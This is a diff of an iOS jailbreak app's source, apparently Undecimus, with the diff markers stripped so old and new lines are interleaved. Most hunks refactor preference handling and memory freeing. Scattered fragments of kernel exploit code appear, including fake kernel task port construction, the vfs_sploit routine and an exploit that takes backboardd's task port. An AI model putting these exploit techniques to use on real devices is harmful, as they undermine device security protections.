- (IBAction)tappedOnCopyNonce:(id)sender{
|
||||
UIAlertController *copyBootNonceAlert = [UIAlertController alertControllerWithTitle:NSLocalizedString(@"Copy boot nonce?", nil) message:NSLocalizedString(@"Would you like to copy nonce generator to clipboard?", nil) preferredStyle:UIAlertControllerStyleAlert];
|
||||
UIAlertAction *copyAction = [UIAlertAction actionWithTitle:NSLocalizedString(@"Yes", nil) style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
|
||||
[[UIPasteboard generalPasteboard] setString:[[NSUserDefaults standardUserDefaults] objectForKey:K_BOOT_NONCE]];
|
||||
auto const copyBootNonceAlert = [UIAlertController alertControllerWithTitle:localize(@"Copy boot nonce?") message:localize(@"Would you like to copy nonce generator to clipboard?") preferredStyle:UIAlertControllerStyleAlert];
|
||||
auto const copyAction = [UIAlertAction actionWithTitle:localize(@"Yes") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
|
||||
auto prefs = copy_prefs();
|
||||
[[UIPasteboard generalPasteboard] setString:@(prefs->boot_nonce)];
|
||||
release_prefs(&prefs);
|
||||
}];
|
||||
UIAlertAction *noAction = [UIAlertAction actionWithTitle:NSLocalizedString(@"No", nil) style:UIAlertActionStyleCancel handler:nil];
|
||||
auto const noAction = [UIAlertAction actionWithTitle:localize(@"No") style:UIAlertActionStyleCancel handler:nil];
|
||||
[copyBootNonceAlert addAction:copyAction];
|
||||
[copyBootNonceAlert addAction:noAction];
|
||||
[self presentViewController:copyBootNonceAlert animated:TRUE completion:nil];
|
||||
}
|
||||
|
||||
- (IBAction)tappedOnCopyECID:(id)sender {
|
||||
UIAlertController *copyBootNonceAlert = [UIAlertController alertControllerWithTitle:NSLocalizedString(@"Copy ECID?", nil) message:NSLocalizedString(@"Would you like to ECID to clipboard?", nil) preferredStyle:UIAlertControllerStyleAlert];
|
||||
UIAlertAction *copyAction = [UIAlertAction actionWithTitle:NSLocalizedString(@"Yes", nil) style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
|
||||
[[UIPasteboard generalPasteboard] setString:hexFromInt([[[NSUserDefaults standardUserDefaults] objectForKey:K_ECID] integerValue])];
|
||||
auto const copyBootNonceAlert = [UIAlertController alertControllerWithTitle:localize(@"Copy ECID?") message:localize(@"Would you like to ECID to clipboard?") preferredStyle:UIAlertControllerStyleAlert];
|
||||
auto const copyAction = [UIAlertAction actionWithTitle:localize(@"Yes") style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
|
||||
auto prefs = copy_prefs();
|
||||
[[UIPasteboard generalPasteboard] setString:hexFromInt(@(prefs->ecid).integerValue)];
|
||||
release_prefs(&prefs);
|
||||
}];
|
||||
UIAlertAction *noAction = [UIAlertAction actionWithTitle:NSLocalizedString(@"No", nil) style:UIAlertActionStyleCancel handler:nil];
|
||||
auto const noAction = [UIAlertAction actionWithTitle:localize(@"No") style:UIAlertActionStyleCancel handler:nil];
|
||||
[copyBootNonceAlert addAction:copyAction];
|
||||
[copyBootNonceAlert addAction:noAction];
|
||||
[self presentViewController:copyBootNonceAlert animated:TRUE completion:nil];
|
||||
}
|
||||
|
||||
- (IBAction)tappedOnCheckForUpdate:(id)sender {
|
||||
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), ^{
|
||||
NSString *Update = [NSString stringWithContentsOfURL:[NSURL URLWithString:@"https://github.com/pwn20wndstuff/Undecimus/raw/master/Update.txt"] encoding:NSUTF8StringEncoding error:nil];
|
||||
if (Update == nil) {
|
||||
NOTICE(NSLocalizedString(@"Failed to check for update.", nil), true, false);
|
||||
} else if ([Update compare:appVersion() options:NSNumericSearch] == NSOrderedDescending) {
|
||||
NOTICE(NSLocalizedString(@"An update is available.", nil), true, false);
|
||||
auto const block = ^(void) {
|
||||
auto const update = [NSString stringWithContentsOfURL:[NSURL URLWithString:@"https://github.com/pwn20wndstuff/Undecimus/raw/master/Update.txt"] encoding:NSUTF8StringEncoding error:nil];
|
||||
if (update == nil) {
|
||||
notice(localize(@"Failed to check for update."), true, false);
|
||||
} else if ([update compare:appVersion() options:NSNumericSearch] == NSOrderedDescending) {
|
||||
notice(localize(@"An update is available."), true, false);
|
||||
} else {
|
||||
NOTICE(NSLocalizedString(@"Already up to date.", nil), true, false);
|
||||
notice(localize(@"Already up to date."), true, false);
|
||||
}
|
||||
});
|
||||
};
|
||||
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
|
||||
}
|
||||
|
||||
- (IBAction)exportKernelTaskPortSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.ExportKernelTaskPortSwitch isOn] forKey:K_EXPORT_KERNEL_TASK_PORT];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->export_kernel_task_port = (bool)self.ExportKernelTaskPortSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)RestoreRootFSSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.RestoreRootFSSwitch isOn] forKey:K_RESTORE_ROOTFS];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->restore_rootfs = (bool)self.RestoreRootFSSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)installCydiaSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.installCydiaSwitch isOn] forKey:K_INSTALL_CYDIA];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->install_cydia = (bool)self.installCydiaSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)installSSHSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.installSSHSwitch isOn] forKey:K_INSTALL_OPENSSH];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->install_openssh = (bool)self.installSSHSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
@@ -423,64 +311,107 @@
|
||||
}
|
||||
|
||||
- (IBAction)IncreaseMemoryLimitSwitch:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.IncreaseMemoryLimitSwitch isOn] forKey:K_INCREASE_MEMORY_LIMIT];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->increase_memory_limit = (bool)self.IncreaseMemoryLimitSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)tappedOnAutomaticallySelectExploit:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setInteger:recommendedJailbreakSupport() forKey:K_EXPLOIT];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->exploit = (int)recommendedJailbreakSupport();
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)reloadSystemDaemonsSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.ReloadSystemDaemonsSwitch isOn] forKey:K_RELOAD_SYSTEM_DAEMONS];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->reload_system_daemons = (bool)self.ReloadSystemDaemonsSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)tappedRestartSpringBoard:(id)sender {
|
||||
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), ^{
|
||||
SETMESSAGE(NSLocalizedString(@"Failed to restart SpringBoard.", nil));
|
||||
NOTICE(NSLocalizedString(@"SpringBoard will be restarted.", nil), true, false);
|
||||
NSInteger support = recommendedRespringSupport();
|
||||
_assert(support != -1, message, true);
|
||||
auto const block = ^(void) {
|
||||
notice(localize(@"SpringBoard will be restarted."), true, false);
|
||||
auto const support = recommendedRespringSupport();
|
||||
switch (support) {
|
||||
case deja_xnu_exploit: {
|
||||
mach_port_t bb_tp = hid_event_queue_exploit();
|
||||
_assert(MACH_PORT_VALID(bb_tp), message, true);
|
||||
_assert(thread_call_remote(bb_tp, exit, 1, REMOTE_LITERAL(EXIT_SUCCESS)) == ERR_SUCCESS, message, true);
|
||||
auto const bb_tp = hid_event_queue_exploit();
|
||||
_assert(MACH_PORT_VALID(bb_tp), localize(@"Unable to get task port for backboardd."), true);
|
||||
_assert(thread_call_remote(bb_tp, exit, 1, REMOTE_LITERAL(EXIT_SUCCESS)) == ERR_SUCCESS, localize(@"Unable to make backboardd exit."), true);
|
||||
break;
|
||||
}
|
||||
default:
|
||||
break;
|
||||
}
|
||||
exit(EXIT_FAILURE);
|
||||
});
|
||||
};
|
||||
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
|
||||
}
|
||||
|
||||
- (IBAction)tappedOnCleanDiagnosticsData:(id)sender {
|
||||
cleanLogs();
|
||||
NOTICE(NSLocalizedString(@"Cleaned diagnostics data.", nil), false, false);
|
||||
notice(localize(@"Cleaned diagnostics data."), false, false);
|
||||
}
|
||||
|
||||
- (IBAction)hideLogWindowSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.HideLogWindowSwitch isOn] forKey:K_HIDE_LOG_WINDOW];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->hide_log_window = (bool)self.HideLogWindowSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), ^{
|
||||
NOTICE(NSLocalizedString(@"Preference was changed. The app will now exit.", nil), true, false);
|
||||
auto const block = ^(void) {
|
||||
notice(localize(@"Preference was changed. The app will now exit."), true, false);
|
||||
exit(EXIT_SUCCESS);
|
||||
});
|
||||
};
|
||||
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
|
||||
}
|
||||
|
||||
- (IBAction)resetCydiaCacheSwitchTriggered:(id)sender {
|
||||
[[NSUserDefaults standardUserDefaults] setBool:[self.ResetCydiaCacheSwitch isOn] forKey:K_RESET_CYDIA_CACHE];
|
||||
[[NSUserDefaults standardUserDefaults] synchronize];
|
||||
auto prefs = copy_prefs();
|
||||
prefs->reset_cydia_cache = (bool)self.ResetCydiaCacheSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)sshOnlySwitchTriggered:(id)sender {
|
||||
auto prefs = copy_prefs();
|
||||
prefs->ssh_only = (bool)self.SSHOnlySwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)enableGetTaskAllowSwitchTriggered:(id)sender {
|
||||
auto prefs = copy_prefs();
|
||||
prefs->enable_get_task_allow = (bool)self.EnableGetTaskAllowSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)setCSDebugged:(id)sender {
|
||||
auto prefs = copy_prefs();
|
||||
prefs->set_cs_debugged = (bool)self.SetCSDebuggedSwitch.isOn;
|
||||
set_prefs(prefs);
|
||||
release_prefs(&prefs);
|
||||
[self reloadData];
|
||||
}
|
||||
|
||||
- (IBAction)tappedOnResetAppPreferences:(id)sender {
|
||||
auto const block = ^(void) {
|
||||
reset_prefs();
|
||||
notice(localize(@"Preferences were reset. The app will now exit."), true, false);
|
||||
exit(EXIT_SUCCESS);
|
||||
};
|
||||
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
|
||||
}
|
||||
|
||||
- (void)didReceiveMemoryWarning {
|
||||
[super didReceiveMemoryWarning];
|
||||
// Dispose of any resources that can be recreated.
|
||||
|
||||
@@ -10,7 +10,7 @@
|
||||
#include <CoreFoundation/CoreFoundation.h>
|
||||
|
||||
#include "KernelMemory.h"
|
||||
#include "KernelStructureOffsets.h"
|
||||
#include "KernelOffsets.h"
|
||||
#include "KernelUtilities.h"
|
||||
#include "async_wake.h"
|
||||
#include "early_kalloc.h"
|
||||
@@ -175,7 +175,7 @@ mach_port_t* prepare_ports(int n_ports)
|
||||
for (int j = 0; j < i; j++) {
|
||||
mach_port_deallocate(mach_task_self(), ports[j]);
|
||||
}
|
||||
free(ports);
|
||||
SafeFreeNULL(ports);
|
||||
return NULL;
|
||||
}
|
||||
}
|
||||
@@ -374,7 +374,7 @@ mach_port_t build_safe_fake_tfp0(uint64_t vm_map, uint64_t space)
|
||||
*(uint64_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map;
|
||||
*(uint8_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22;
|
||||
kmemcpy(fake_kernel_task_kaddr, (uint64_t)fake_kernel_task, 0x1000);
|
||||
free(fake_kernel_task);
|
||||
SafeFreeNULL(fake_kernel_task);
|
||||
|
||||
uint32_t fake_task_refs = ReadKernel32(fake_kernel_task_kaddr + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT));
|
||||
LOG("read fake_task_refs: %x", fake_task_refs);
|
||||
@@ -590,7 +590,7 @@ mach_port_t get_kernel_memory_rw()
|
||||
// now free first replacer and put a fake kernel task port there
|
||||
// we need to do this becase the first time around we don't know the address
|
||||
// of ipc_space_kernel which means we can't fake a port owned by the kernel
|
||||
free(replacer_message_body);
|
||||
SafeFreeNULL(replacer_message_body);
|
||||
replacer_message_body = build_message_payload(first_port_address, replacer_body_size, message_body_offset, kernel_vm_map, ipc_space_kernel(), &context_ptr);
|
||||
if (replacer_message_body == NULL) {
|
||||
return MACH_PORT_NULL;
|
||||
|
||||
@@ -0,0 +1,23 @@
|
||||
//
|
||||
// diagnostics.h
|
||||
// Undecimus
|
||||
//
|
||||
// Created by Pwn20wnd on 5/3/19.
|
||||
// Copyright © 2019 Pwn20wnd. All rights reserved.
|
||||
//
|
||||
|
||||
#ifndef diagnostics_h
|
||||
#define diagnostics_h
|
||||
|
||||
#include <Foundation/Foundation.h>
|
||||
|
||||
#define STATUS_FILE @"/var/lib/dpkg/status"
|
||||
#define CYDIA_LIST @"/etc/apt/sources.list.d/cydia.list"
|
||||
|
||||
NSArray *dependencyArrayFromString(NSString *depends);
|
||||
NSArray *parsedPackageArray(void);
|
||||
NSString *domainFromRepoObject(NSString *repoObject);
|
||||
NSArray *sourcesFromFile(NSString *theSourceFile);
|
||||
NSDictionary *getDiagnostics(void);
|
||||
|
||||
#endif /* diagnostics_h */
|
||||
@@ -0,0 +1,147 @@
|
||||
//
|
||||
// diagnostics.c
|
||||
// Undecimus
|
||||
//
|
||||
// Created by Pwn20wnd on 5/3/19.
|
||||
// Copyright © 2019 Pwn20wnd. All rights reserved.
|
||||
//
|
||||
|
||||
#include "diagnostics.h"
|
||||
#include <common.h>
|
||||
#include <sys/utsname.h>
|
||||
#include <sys/sysctl.h>
|
||||
#include "utils.h"
|
||||
#include "prefs.h"
|
||||
|
||||
#if 0
|
||||
Credits:
|
||||
- https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L1138
|
||||
- https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L1163
|
||||
- https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L854
|
||||
- https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L869
|
||||
#endif
|
||||
|
||||
NSArray *dependencyArrayFromString(NSString *depends) {
|
||||
NSMutableArray *cleanArray = [NSMutableArray new];
|
||||
NSArray *dependsArray = [depends componentsSeparatedByString:@","];
|
||||
for (NSString *depend in dependsArray) {
|
||||
NSArray *spaceDelimitedArray = [depend componentsSeparatedByString:@" "];
|
||||
NSString *isolatedDependency = [[spaceDelimitedArray objectAtIndex:0] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
|
||||
if ([isolatedDependency length] == 0) {
|
||||
isolatedDependency = [[spaceDelimitedArray objectAtIndex:1] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
|
||||
}
|
||||
[cleanArray addObject:isolatedDependency];
|
||||
}
|
||||
return cleanArray;
|
||||
}
|
||||
|
||||
NSArray *parsedPackageArray() {
|
||||
NSString *packageString = [NSString stringWithContentsOfFile:STATUS_FILE encoding:NSUTF8StringEncoding error:nil];
|
||||
NSArray *lineArray = [packageString componentsSeparatedByString:@"\n\n"];
|
||||
NSMutableArray *mutableList = [[NSMutableArray alloc] init];
|
||||
for (NSString *currentItem in lineArray) {
|
||||
NSArray *packageArray = [currentItem componentsSeparatedByString:@"\n"];
|
||||
NSMutableDictionary *currentPackage = [[NSMutableDictionary alloc] init];
|
||||
for (NSString *currentLine in packageArray) {
|
||||
NSArray *itemArray = [currentLine componentsSeparatedByString:@": "];
|
||||
if ([itemArray count] >= 2) {
|
||||
NSString *key = [itemArray objectAtIndex:0];
|
||||
NSString *object = [itemArray objectAtIndex:1];
|
||||
if ([key isEqualToString:@"Depends"]) {
|
||||
NSArray *dependsObject = dependencyArrayFromString(object);
|
||||
[currentPackage setObject:dependsObject forKey:key];
|
||||
} else {
|
||||
[currentPackage setObject:object forKey:key];
|
||||
}
|
||||
}
|
||||
}
|
||||
if ([[currentPackage allKeys] count] > 4) {
|
||||
[mutableList addObject:currentPackage];
|
||||
}
|
||||
currentPackage = nil;
|
||||
}
|
||||
NSSortDescriptor *nameDescriptor = [[NSSortDescriptor alloc] initWithKey:@"Name" ascending:YES selector:@selector(localizedCaseInsensitiveCompare:)];
|
||||
NSSortDescriptor *packageDescriptor = [[NSSortDescriptor alloc] initWithKey:@"Package" ascending:YES selector:@selector(localizedCaseInsensitiveCompare:)];
|
||||
NSArray *descriptors = [NSArray arrayWithObjects:nameDescriptor, packageDescriptor, nil];
|
||||
NSArray *sortedArray = [mutableList sortedArrayUsingDescriptors:descriptors];
|
||||
mutableList = nil;
|
||||
return sortedArray;
|
||||
}
|
||||
|
||||
NSString *domainFromRepoObject(NSString *repoObject) {
|
||||
if ([repoObject length] == 0) return nil;
|
||||
NSArray *sourceObjectArray = [repoObject componentsSeparatedByString:@" "];
|
||||
NSString *url = [sourceObjectArray objectAtIndex:1];
|
||||
if ([url length] > 7) {
|
||||
NSString *urlClean = [url substringFromIndex:7];
|
||||
NSArray *secondArray = [urlClean componentsSeparatedByString:@"/"];
|
||||
return [secondArray objectAtIndex:0];
|
||||
}
|
||||
return nil;
|
||||
}
|
||||
|
||||
NSArray *sourcesFromFile(NSString *theSourceFile) {
|
||||
NSMutableArray *finalArray = [NSMutableArray new];
|
||||
NSString *sourceString = [[NSString stringWithContentsOfFile:theSourceFile encoding:NSASCIIStringEncoding error:nil] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
|
||||
NSArray *sourceFullArray = [sourceString componentsSeparatedByString:@"\n"];
|
||||
NSEnumerator *sourceEnum = [sourceFullArray objectEnumerator];
|
||||
NSString *currentSource = nil;
|
||||
while (currentSource = [sourceEnum nextObject]) {
|
||||
NSString *theObject = domainFromRepoObject(currentSource);
|
||||
if (theObject != nil) {
|
||||
if (![finalArray containsObject:theObject])
|
||||
[finalArray addObject:theObject];
|
||||
}
|
||||
}
|
||||
return finalArray;
|
||||
}
|
||||
|
||||
NSDictionary *getDiagnostics() {
|
||||
NSMutableDictionary *diagnostics = [NSMutableDictionary new];
|
||||
char *OSVersion = getOSVersion();
|
||||
assert(OSVersion != NULL);
|
||||
char *OSProductVersion = getOSProductVersion();
|
||||
assert(OSProductVersion != NULL);
|
||||
char *kernelVersion = getKernelVersion();
|
||||
assert(kernelVersion != NULL);
|
||||
char *machineName = getMachineName();
|
||||
assert(machineName != NULL);
|
||||
prefs_t *prefs = copy_prefs();
|
||||
diagnostics[@"OSVersion"] = [NSString stringWithUTF8String:OSVersion];
|
||||
diagnostics[@"OSProductVersion"] = [NSString stringWithUTF8String:OSProductVersion];
|
||||
diagnostics[@"KernelVersion"] = [NSString stringWithUTF8String:kernelVersion];
|
||||
diagnostics[@"MachineName"] = [NSString stringWithUTF8String:machineName];
|
||||
diagnostics[@"Preferences"] = [NSMutableDictionary new];
|
||||
diagnostics[@"Preferences"][@K_TWEAK_INJECTION] = [NSNumber numberWithBool:(BOOL)prefs->load_tweaks];
|
||||
diagnostics[@"Preferences"][@K_LOAD_DAEMONS] = [NSNumber numberWithBool:(BOOL)prefs->load_daemons];
|
||||
diagnostics[@"Preferences"][@K_DUMP_APTICKET] = [NSNumber numberWithBool:(BOOL)prefs->dump_apticket];
|
||||
diagnostics[@"Preferences"][@K_REFRESH_ICON_CACHE] = [NSNumber numberWithBool:(BOOL)prefs->run_uicache];
|
||||
diagnostics[@"Preferences"][@K_BOOT_NONCE] = [NSString stringWithUTF8String:(const char *)prefs->boot_nonce];
|
||||
diagnostics[@"Preferences"][@K_DISABLE_AUTO_UPDATES] = [NSNumber numberWithBool:(BOOL)prefs->disable_auto_updates];
|
||||
diagnostics[@"Preferences"][@K_DISABLE_APP_REVOKES] = [NSNumber numberWithBool:(BOOL)prefs->disable_app_revokes];
|
||||
diagnostics[@"Preferences"][@K_OVERWRITE_BOOT_NONCE] = [NSNumber numberWithBool:(BOOL)prefs->overwrite_boot_nonce];
|
||||
diagnostics[@"Preferences"][@K_EXPORT_KERNEL_TASK_PORT] = [NSNumber numberWithBool:(BOOL)prefs->export_kernel_task_port];
|
||||
diagnostics[@"Preferences"][@K_RESTORE_ROOTFS] = [NSNumber numberWithBool:(BOOL)prefs->restore_rootfs];
|
||||
diagnostics[@"Preferences"][@K_INCREASE_MEMORY_LIMIT] = [NSNumber numberWithBool:(BOOL)prefs->increase_memory_limit];
|
||||
diagnostics[@"Preferences"][@K_ECID] = [NSString stringWithUTF8String:(const char *)prefs->ecid];
|
||||
diagnostics[@"Preferences"][@K_INSTALL_CYDIA] = [NSNumber numberWithBool:(BOOL)prefs->install_cydia];
|
||||
diagnostics[@"Preferences"][@K_INSTALL_OPENSSH] = [NSNumber numberWithBool:(BOOL)prefs->install_openssh];
|
||||
diagnostics[@"Preferences"][@K_RELOAD_SYSTEM_DAEMONS] = [NSNumber numberWithBool:(BOOL)prefs->reload_system_daemons];
|
||||
diagnostics[@"Preferences"][@K_RESET_CYDIA_CACHE] = [NSNumber numberWithBool:(BOOL)prefs->reset_cydia_cache];
|
||||
diagnostics[@"Preferences"][@K_SSH_ONLY] = [NSNumber numberWithBool:(BOOL)prefs->ssh_only];
|
||||
diagnostics[@"Preferences"][@K_ENABLE_GET_TASK_ALLOW] = [NSNumber numberWithBool:(BOOL)prefs->enable_get_task_allow];
|
||||
diagnostics[@"Preferences"][@K_SET_CS_DEBUGGED] = [NSNumber numberWithBool:(BOOL)prefs->set_cs_debugged];
|
||||
diagnostics[@"Preferences"][@K_HIDE_LOG_WINDOW] = [NSNumber numberWithBool:(BOOL)prefs->hide_log_window];
|
||||
diagnostics[@"Preferences"][@K_EXPLOIT] = [NSNumber numberWithInt:(int)prefs->exploit];
|
||||
diagnostics[@"AppVersion"] = [NSString stringWithString:appVersion()];
|
||||
diagnostics[@"LogFile"] = [NSString stringWithContentsOfFile:getLogFile() encoding:NSUTF8StringEncoding error:nil];
|
||||
diagnostics[@"Sources"] = [NSArray arrayWithArray:sourcesFromFile(CYDIA_LIST)];
|
||||
diagnostics[@"Packages"] = [NSArray arrayWithArray:parsedPackageArray()];
|
||||
diagnostics[@"Uptime"] = [NSNumber numberWithDouble:getUptime()];
|
||||
SafeFreeNULL(OSVersion);
|
||||
SafeFreeNULL(OSProductVersion);
|
||||
SafeFreeNULL(kernelVersion);
|
||||
SafeFreeNULL(machineName);
|
||||
release_prefs(&prefs);
|
||||
return diagnostics;
|
||||
}
|
||||
@@ -13,7 +13,7 @@
|
||||
#include <stdlib.h>
|
||||
|
||||
#include "KernelMemory.h"
|
||||
#include "KernelStructureOffsets.h"
|
||||
#include "KernelOffsets.h"
|
||||
#include "KernelUtilities.h"
|
||||
#include "find_port.h"
|
||||
#include <common.h>
|
||||
|
||||
@@ -12,7 +12,7 @@
|
||||
#include <mach/mach.h>
|
||||
|
||||
#include "KernelMemory.h"
|
||||
#include "KernelStructureOffsets.h"
|
||||
#include "KernelOffsets.h"
|
||||
#include "KernelUtilities.h"
|
||||
#include "empty_list_sploit.h"
|
||||
#include <common.h>
|
||||
@@ -271,8 +271,8 @@ static mach_port_t hold_kallocs(uint32_t kalloc_size, int allocs_per_message, in
|
||||
//return false;
|
||||
}
|
||||
}
|
||||
free(ports_to_send);
|
||||
free(msg);
|
||||
SafeFreeNULL(ports_to_send);
|
||||
SafeFreeNULL(msg);
|
||||
|
||||
return port;
|
||||
}
|
||||
@@ -394,7 +394,7 @@ static uint32_t early_rk32(uint64_t kaddr)
|
||||
LOG("pid_for_task returned %x (%s)", err, mach_error_string(err));
|
||||
}
|
||||
LOG("read val via pid_for_task: %08x", val);
|
||||
free(buf);
|
||||
SafeFreeNULL(buf);
|
||||
return val;
|
||||
}
|
||||
|
||||
@@ -415,7 +415,8 @@ bool vfs_sploit()
|
||||
increase_limits();
|
||||
|
||||
size_t kernel_page_size = 0;
|
||||
host_page_size(mach_host_self(), &kernel_page_size);
|
||||
host_t host = mach_host_self();
|
||||
host_page_size(host, &kernel_page_size);
|
||||
if (kernel_page_size == 0x4000) {
|
||||
LOG("this device uses 16k kernel pages");
|
||||
} else if (kernel_page_size == 0x1000) {
|
||||
@@ -809,8 +810,8 @@ bool vfs_sploit()
|
||||
break;
|
||||
}
|
||||
}
|
||||
free(old_contents);
|
||||
free(new_contents);
|
||||
SafeFreeNULL(old_contents);
|
||||
SafeFreeNULL(new_contents);
|
||||
if (pipe_target_kaddr_replacer_index == -1) {
|
||||
LOG("failed to find the pipe_target_kaddr_replacer pipe");
|
||||
}
|
||||
@@ -829,7 +830,7 @@ bool vfs_sploit()
|
||||
host_msg.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, MACH_MSG_TYPE_COPY_SEND);
|
||||
host_msg.msgh_size = sizeof(host_msg);
|
||||
host_msg.msgh_remote_port = canary_port;
|
||||
host_msg.msgh_local_port = mach_host_self();
|
||||
host_msg.msgh_local_port = host;
|
||||
host_msg.msgh_id = 0x12344321;
|
||||
|
||||
err = mach_msg(&host_msg,
|
||||
@@ -1050,6 +1051,8 @@ bool vfs_sploit()
|
||||
close(write_ends[i]);
|
||||
close(read_ends[i]);
|
||||
}
|
||||
|
||||
mach_port_deallocate(mach_task_self(), host);
|
||||
|
||||
LOG("done!");
|
||||
|
||||
|
||||
@@ -5,7 +5,7 @@
|
||||
#include <mach/mach.h>
|
||||
|
||||
#include "KernelMemory.h"
|
||||
#include "KernelStructureOffsets.h"
|
||||
#include "KernelOffsets.h"
|
||||
#include "KernelUtilities.h"
|
||||
#include "find_port.h"
|
||||
#include <common.h>
|
||||
@@ -228,7 +228,7 @@ uint64_t find_port_via_proc_pidlistuptrs_bug(mach_port_t port, int disposition)
|
||||
|
||||
//LOG("best guess is: 0x%016llx with %d%% of the valid guesses for it", best_guess, (best_guess_count*100)/valid_guesses);
|
||||
|
||||
free(guesses);
|
||||
SafeFreeNULL(guesses);
|
||||
|
||||
return best_guess;
|
||||
}
|
||||
|
||||
@@ -0,0 +1,16 @@
|
||||
//
|
||||
// jailbreak.h
|
||||
// Undecimus
|
||||
//
|
||||
// Created by Pwn20wnd on 5/11/19.
|
||||
// Copyright © 2019 Pwn20wnd. All rights reserved.
|
||||
//
|
||||
|
||||
#ifndef jailbreak_h
|
||||
#define jailbreak_h
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
void jailbreak(void);
|
||||
|
||||
#endif /* jailbreak_h */
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,90 @@
|
||||
//
|
||||
// panic.c
|
||||
// Undecimus
|
||||
//
|
||||
// Created by Pwn20wnd on 4/20/19.
|
||||
// Copyright © 2019 Pwn20wnd. All rights reserved.
|
||||
//
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <mach/mach.h>
|
||||
#include <common.h>
|
||||
#include "kalloc_crash.h"
|
||||
|
||||
struct simple_msg
|
||||
{
|
||||
mach_msg_header_t hdr;
|
||||
char buf[0];
|
||||
};
|
||||
|
||||
/* credits to ian beer */
|
||||
static mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size)
|
||||
{
|
||||
// allocate a port to send the messages to
|
||||
mach_port_t q = MACH_PORT_NULL;
|
||||
